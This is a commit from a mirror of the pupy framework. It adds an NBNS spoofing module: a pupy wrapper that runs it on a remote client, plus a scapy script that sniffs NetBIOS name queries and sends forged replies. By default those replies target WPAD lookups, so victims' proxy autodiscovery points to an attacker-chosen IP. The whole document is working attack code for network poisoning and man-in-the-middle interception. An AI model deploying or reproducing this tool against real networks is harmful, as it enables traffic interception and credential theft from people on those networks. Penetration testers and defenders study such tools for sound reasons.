mirror of https://github.com/n1nj4sec/pupy.git
nbnspoof module (tested on windows only)
This commit is contained in:
n1nj4sec
parent
6a21b81c81
commit
5cc8001b96
|
|
@ -0,0 +1,40 @@
|
||||||
|
# -*- coding: UTF8 -*-
|
||||||
|
# Copyright (c) 2017, Nicolas VERDIER (contact@n1nj4.eu)
|
||||||
|
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
||||||
|
import sys
|
||||||
|
import subprocess
|
||||||
|
import threading
|
||||||
|
import Queue
|
||||||
|
import time
|
||||||
|
from modules.lib.windows.winpcap import init_winpcap
|
||||||
|
from pupylib import *
|
||||||
|
|
||||||
|
__class_name__="NbnsSpoofModule"
|
||||||
|
|
||||||
|
@config(cat="network", tags=["netbios", "NBNS", "spoof"])
|
||||||
|
class NbnsSpoofModule(PupyModule):
|
||||||
|
""" sniff for NBNS requests and spoof NBNS responses """
|
||||||
|
|
||||||
|
max_clients=1
|
||||||
|
dependencies=['scapy', 'nbnsspoof']
|
||||||
|
|
||||||
|
def init_argparse(self):
|
||||||
|
self.arg_parser = PupyArgumentParser(prog='nbnsspoof.py', description=self.__doc__)
|
||||||
|
self.arg_parser.add_argument("-i", "--iface", default=None, help="change default iface")
|
||||||
|
self.arg_parser.add_argument("--timeout", type=int, default=300, help="stop the spoofing after N seconds (default 300)")
|
||||||
|
self.arg_parser.add_argument("--regex", default=".*WPAD.*", help="only answer for requests matching the regex (default: .*WPAD.*)")
|
||||||
|
self.arg_parser.add_argument("srcmac", help="source mac address to use for the responses")
|
||||||
|
self.arg_parser.add_argument("ip", help="IP to spoof")
|
||||||
|
|
||||||
|
|
||||||
|
def run(self, args):
|
||||||
|
init_winpcap(self)
|
||||||
|
|
||||||
|
with redirected_stdo(self.client.conn):
|
||||||
|
self.client.conn.modules['nbnsspoof'].start_nbnsspoof(args.ip, args.srcmac, timeout=args.timeout, verbose=True, interface=args.iface, name_regexp=args.regex)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
@ -0,0 +1,87 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
# Originaly from :
|
||||||
|
# nbnspoof.py 03-27-2007 Robert Wesley McGrew
|
||||||
|
# wesley@mcgrewsecurity.com
|
||||||
|
# http://mcgrewsecurity.com
|
||||||
|
# Keeping things simple: You may use this code however you see fit, so
|
||||||
|
# long as you give me proper credit. Email me if you have any
|
||||||
|
# questions.
|
||||||
|
# rewritten by Nicolas VERDIER for pupy
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import re
|
||||||
|
from scapy.all import *
|
||||||
|
|
||||||
|
|
||||||
|
def pack_ip(addr):
|
||||||
|
temp = IP(src=addr)
|
||||||
|
return str(temp)[0x0c:0x10]
|
||||||
|
|
||||||
|
def unpack_ip(bin):
|
||||||
|
temp = IP()
|
||||||
|
temp = str(temp)[:0x0c] + bin + str(temp)[0x10:]
|
||||||
|
temp = IP(temp)
|
||||||
|
return temp.src
|
||||||
|
|
||||||
|
def config_nbns(ip, mac_addr, regexp, verbose=True, interface=None):
|
||||||
|
def get_packet(pkt):
|
||||||
|
|
||||||
|
if not pkt.getlayer(NBNSQueryRequest):
|
||||||
|
return
|
||||||
|
|
||||||
|
if pkt.FLAGS & 0x8000:
|
||||||
|
query = False
|
||||||
|
addr = unpack_ip(str(pkt.getlayer(Raw))[8:])
|
||||||
|
else:
|
||||||
|
query = True
|
||||||
|
|
||||||
|
if verbose:
|
||||||
|
print str(pkt.NAME_TRN_ID) + ":",
|
||||||
|
if query:
|
||||||
|
print "Q",
|
||||||
|
else:
|
||||||
|
print "R",
|
||||||
|
print "SRC:" + pkt.getlayer(IP).src + " DST:" + pkt.getlayer(IP).dst,
|
||||||
|
if query:
|
||||||
|
print 'NAME:"' + pkt.QUESTION_NAME + '"'
|
||||||
|
else:
|
||||||
|
print 'NAME:"' + pkt.QUESTION_NAME + '"',
|
||||||
|
print 'IP:' + addr
|
||||||
|
|
||||||
|
if query and regexp.match(pkt.QUESTION_NAME.rstrip(),1):
|
||||||
|
response = Ether(dst=pkt.src,src=mac_addr)
|
||||||
|
response /= IP(dst=pkt.getlayer(IP).src,src=ip)
|
||||||
|
response /= UDP(sport=137,dport=137)
|
||||||
|
response /= NBNSQueryRequest(NAME_TRN_ID=pkt.getlayer(NBNSQueryRequest).NAME_TRN_ID,\
|
||||||
|
FLAGS=0x8500,\
|
||||||
|
QDCOUNT=0,\
|
||||||
|
ANCOUNT=1,\
|
||||||
|
NSCOUNT=0,\
|
||||||
|
ARCOUNT=0,\
|
||||||
|
QUESTION_NAME=pkt.getlayer(NBNSQueryRequest).QUESTION_NAME,\
|
||||||
|
SUFFIX=pkt.getlayer(NBNSQueryRequest).SUFFIX,\
|
||||||
|
NULL=0,\
|
||||||
|
QUESTION_TYPE=pkt.getlayer(NBNSQueryRequest).QUESTION_TYPE,\
|
||||||
|
QUESTION_CLASS=pkt.getlayer(NBNSQueryRequest).QUESTION_CLASS)
|
||||||
|
response /= Raw()
|
||||||
|
# Time to live: 3 days, 11 hours, 20 minutes
|
||||||
|
response.getlayer(Raw).load += '\x00\x04\x93\xe0'
|
||||||
|
# Data length: 6
|
||||||
|
response.getlayer(Raw).load += '\x00\x06'
|
||||||
|
# Flags: (B-node, unique)
|
||||||
|
response.getlayer(Raw).load += '\x00\x00'
|
||||||
|
# The IP we're giving them:
|
||||||
|
response.getlayer(Raw).load += pack_ip(ip)
|
||||||
|
sendp(response,iface=interface,verbose=0)
|
||||||
|
if verbose:
|
||||||
|
print 'Sent spoofed reply to #' + str(response.getlayer(NBNSQueryRequest).NAME_TRN_ID)
|
||||||
|
return get_packet
|
||||||
|
|
||||||
|
|
||||||
|
def start_nbnsspoof(ip, mac_addr, timeout=600, verbose=True, interface=None, name_regexp=".*WPAD.*"):
|
||||||
|
regexp = re.compile(name_regexp,re.IGNORECASE)
|
||||||
|
func=config_nbns(ip, mac_addr, regexp, verbose=verbose, interface=interface)
|
||||||
|
sniff(iface=interface,filter="udp and port 137", store=0, prn=func, timeout=timeout)
|
||||||
|
|
||||||
|
|
||||||
Loading…
Reference in New Issue